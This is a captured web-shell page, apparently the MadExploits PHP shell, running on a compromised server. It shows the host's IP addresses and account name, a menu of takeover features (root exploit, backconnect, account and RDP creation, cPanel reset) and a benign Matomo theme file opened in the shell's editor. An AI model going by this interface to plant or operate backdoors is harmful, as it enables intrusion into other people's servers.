Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.117.156.153
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
core /
Plugin /
[ HOME SHELL ]
Name
Size
Permission
Action
Dimension
[ DIR ]
drwxr-xr-x
API.php
4.12
KB
-rw-r--r--
AggregatedMetric.php
612
B
-rw-r--r--
ArchivedMetric.php
5.58
KB
-rw-r--r--
Archiver.php
5.64
KB
-rw-r--r--
Categories.php
1.99
KB
-rw-r--r--
ComponentFactory.php
4.94
KB
-rw-r--r--
ComputedMetric.php
8.45
KB
-rw-r--r--
ConsoleCommand.php
1.43
KB
-rw-r--r--
Controller.php
41.92
KB
-rw-r--r--
ControllerAdmin.php
16.01
KB
-rw-r--r--
Dependency.php
5.98
KB
-rw-r--r--
LogTablesProvider.php
3.11
KB
-rw-r--r--
Manager.php
52.91
KB
-rw-r--r--
Menu.php
11.54
KB
-rw-r--r--
MetadataLoader.php
3.73
KB
-rw-r--r--
Metric.php
6.41
KB
-rw-r--r--
PluginException.php
1.11
KB
-rw-r--r--
ProcessedMetric.php
2.27
KB
-rw-r--r--
ReleaseChannels.php
2.55
KB
-rw-r--r--
Report.php
35.26
KB
-rw-r--r--
ReportsProvider.php
9.3
KB
-rw-r--r--
RequestProcessors.php
630
B
-rw-r--r--
Segment.php
12.75
KB
-rw-r--r--
SettingsProvider.php
7.15
KB
-rw-r--r--
Tasks.php
5.37
KB
-rw-r--r--
ThemeStyles.php
5.82
KB
-rw-r--r--
ViewDataTable.php
21.71
KB
-rw-r--r--
Visualization.php
33.17
KB
-rw-r--r--
WidgetsProvider.php
4.53
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ThemeStyles.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later * */ namespace Piwik\Plugin; use Piwik\Piwik; class ThemeStyles { // to maintain BC w/ old names that were defined in LESS private static $propertyNamesToLessVariableNames = [ 'fontFamilyBase' => 'theme-fontFamily-base', 'colorBrand' => 'theme-color-brand', 'colorBrandContrast' => 'theme-color-brand-contrast', 'colorText' => 'theme-color-text', 'colorTextLight' => 'theme-color-text-light', 'colorTextLighter' => 'theme-color-text-lighter', 'colorTextContrast' => 'theme-color-text-contrast', 'colorLink' => 'theme-color-link', 'colorBaseSeries' => 'theme-color-base-series', 'colorHeadlineAlternative' => 'theme-color-headline-alternative', 'colorHeaderBackground' => 'theme-color-header-background', 'colorHeaderText' => 'theme-color-header-text', 'colorMenuContrastText' => 'theme-color-menu-contrast-text', 'colorMenuContrastTextSelected' => 'theme-color-menu-contrast-textSelected', 'colorMenuContrastTextActive' => 'theme-color-menu-contrast-textActive', 'colorMenuContrastBackground' => 'theme-color-menu-contrast-background', 'colorWidgetExportedBackgroundBase' => 'theme-color-widget-exported-background-base', 'colorWidgetTitleText' => 'theme-color-widget-title-text', 'colorWidgetTitleBackground' => 'theme-color-widget-title-background', 'colorBackgroundBase' => 'theme-color-background-base', 'colorBackgroundTinyContrast' => 'theme-color-background-tinyContrast', 'colorBackgroundLowContrast' => 'theme-color-background-lowContrast', 'colorBackgroundContrast' => 'theme-color-background-contrast', 'colorBackgroundHighContrast' => 'theme-color-background-highContrast', 'colorBorder' => 'theme-color-border', 'colorCode' => 'theme-color-code', 'colorCodeBackground' => 'theme-color-code-background', 'colorWidgetBackground' => 'theme-color-widget-background', 'colorWidgetBorder' => 'theme-color-widget-border', ]; /** * @var string */ public $fontFamilyBase = '-apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Cantarell, \'Helvetica Neue\', sans-serif'; /** * @var string */ public $colorBrand = '#43a047'; /** * @var string */ public $colorBrandContrast = '#fff'; /** * @var string */ public $colorText = '#212121'; /** * @var string */ public $colorTextLight = '#444'; /** * @var string */ public $colorTextLighter = '#666666'; /** * @var string */ public $colorTextContrast = '#37474f'; /** * @var string */ public $colorLink = '#1976D2'; /** * @var string */ public $colorBaseSeries = '#ee3024'; /** * @var string */ public $colorHeadlineAlternative = '#4E4E4E'; /** * @var string */ public $colorHeaderBackground = '#3450A3'; /** * @var string */ public $colorHeaderText = '#fff'; /** * @var string */ public $colorMenuContrastText; /** * @var string */ public $colorMenuContrastTextSelected; /** * @var string */ public $colorMenuContrastTextActive = '#3450A3'; /** * @var string */ public $colorMenuContrastBackground; /** * @var string */ public $colorWidgetExportedBackgroundBase; /** * @var string */ public $colorWidgetTitleText; /** * @var string */ public $colorWidgetTitleBackground; /** * @var string */ public $colorBackgroundBase = '#eff0f1'; /** * @var string */ public $colorBackgroundTinyContrast = '#f2f2f2'; /** * @var string */ public $colorBackgroundLowContrast = '#d9d9d9'; /** * @var string */ public $colorBackgroundContrast = '#fff'; /** * @var string */ public $colorBackgroundHighContrast = '#202020'; /** * @var string */ public $colorBorder = '#cccccc'; /** * @var string */ public $colorCode = '#f3f3f3'; /** * @var string */ public $colorCodeBackground = '#4d4d4d'; /** * @var string */ public $colorWidgetBackground; /** * @var string */ public $colorWidgetBorder; public function __construct() { $this->colorMenuContrastText = $this->colorText; $this->colorMenuContrastTextSelected = $this->colorMenuContrastText; $this->colorMenuContrastBackground = $this->colorBackgroundContrast; $this->colorWidgetExportedBackgroundBase = $this->colorBackgroundContrast; $this->colorWidgetTitleText = $this->colorText; $this->colorWidgetTitleBackground = $this->colorBackgroundContrast; $this->colorWidgetBackground = $this->colorBackgroundContrast; $this->colorWidgetBorder = $this->colorBackgroundTinyContrast; } /** * @return ThemeStyles */ public static function get() { $result = new self(); /** * @ignore */ Piwik::postEvent('Theme.configureThemeVariables', [$result]); return $result; } public function toLessCode() { $result = ''; foreach (get_object_vars($this) as $name => $value) { $varName = isset(self::$propertyNamesToLessVariableNames[$name]) ? self::$propertyNamesToLessVariableNames[$name] : $this->getGenericThemeVarName($name); $result .= "@$varName: $value;\n"; } return $result; } private function getGenericThemeVarName($propertyName) { return 'theme-' . $propertyName; } }
Close